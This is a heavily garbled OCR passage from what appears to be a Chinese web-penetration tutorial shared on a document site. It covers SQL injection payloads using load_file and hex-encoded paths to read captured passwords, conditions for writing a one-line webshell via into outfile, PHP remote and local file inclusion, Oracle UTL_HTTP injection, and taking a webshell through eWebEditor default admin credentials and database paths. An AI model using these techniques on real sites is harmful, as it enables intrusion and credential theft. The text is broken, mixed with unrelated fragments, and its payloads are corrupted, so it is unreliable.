hp?ID=171and1=26F77735C73797374656D33325C626F6F742E646174),3,4,5--”,顯示了截獲到的系統(tǒng)密碼,如圖XX所示。Vmse/news/datail.php?ID=17120and&201=2220mion20xelect201,1ond_file0x633A5C77896E2009/6/26/15:10:54User=Admi另外,還可以讀取其它密碼截獲工具所記錄的密碼文件,如:shift后門的密碼文使用ooutfile將一句話網(wǎng)馬直接插入網(wǎng)站目錄,需要滿足五個(gè)條件:①必須知道網(wǎng)站的絕對路徑,這樣才能寫對目錄;②Mysql的版本在4.0以上,才能使用union進(jìn)行聯(lián)合查詢;③PHP配置文件php.ini中的magic_quotes_gpc=off,沒有對“'”進(jìn)行有該權(quán)限)。and1=2unionsele//shell.p遠(yuǎn)程文件包含漏洞產(chǎn)生的原因是由于網(wǎng)站服務(wù)器通過PHP的函數(shù)(include()、提交URL為“/index.php?page=hello.php”,index.php里面的程序 Warning:include(hello.php)[function.include]:failedtoopenstream:No Warning:include()[function.include]:Failedopening'hello.php'forinclusion(include [bootloader]timeout=30default=multi(O)disk(O)rdisk(O)partition(1)\WINDOW解①細(xì)驚解①細(xì)驚g圈TheAppServOpenProject-2.5.10forWin·or.log中,當(dāng)攻擊者利用本地文件包含漏洞的去加載error.log時(shí)(即:提交UR///index如果PHP中“allow_url_fopen=on”(注:默認(rèn)是開啟的),可以利用include()函數(shù)文件文件Q)編輯道)查看V收章(Q)工具①)幫助@0地址@)[Zindex.php?psge=http://1/class.phpFileManager-CurrentCurentDirectoyOWrtahlWebRogtIScrpteathIMewAIIMewWntable(DirectorIFile)ICrateDire口圖XX1.30racle+JSP平臺注入攻擊技術(shù)MicrosoftWindowsXP[版本5.1.26001TTPrequest('http://06:2007/l(selleaselease.0”,如圖XX所示。TTP.request('http://06:2007/ll(selectinstance“三年時(shí)間引進(jìn)千名以上高層次人才”工作的實(shí)隨意見入津市中長期人才發(fā)1.4獲取Webshell1.4.1利用eWebEditor編輯器編輯器在給程序員帶來方便的同時(shí),也深深地埋下了隱患。比較流行的網(wǎng)站編輯器或多或少爆出過安全漏洞,利用編輯器漏洞對網(wǎng)站進(jìn)行攻擊是一種比較常見的入侵手eWebEditor編輯器默認(rèn)后臺地址為“Admin_login.Asp”、默認(rèn)用戶名和密碼為“admin”。如果網(wǎng)站管理員修改了默認(rèn)登陸密碼,可以嘗試下載eWebEditor編輯器的數(shù)據(jù)/eWebEd/eWebEditor/db/復(fù)件%20eWebEditor.mdb/eWebEditor/db/eWebEdi/eWebEditor/db/eWebEditor##.mdb下載數(shù)據(jù)庫文件后,使用“輔臣數(shù)據(jù)庫瀏覽器工具”輔臣教據(jù)府端崗縣V1.0WebEditor_Style(13)ys_Yersiony5_值退出QX)一條記錄→藝膽船涵曲D高_(dá)3h覽低商設(shè)置I工月欄物貝設(shè)固樣式(限用師入相可香明生帶唱秘第遠(yuǎn)程限制:p00認(rèn)不顯示口樣式預(yù)覽樣式預(yù)覽日四⑥國四盒合eWebEditor-eWebsof...e樣式預(yù)覽kIMGsrc="/eWebEditor/Upl

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論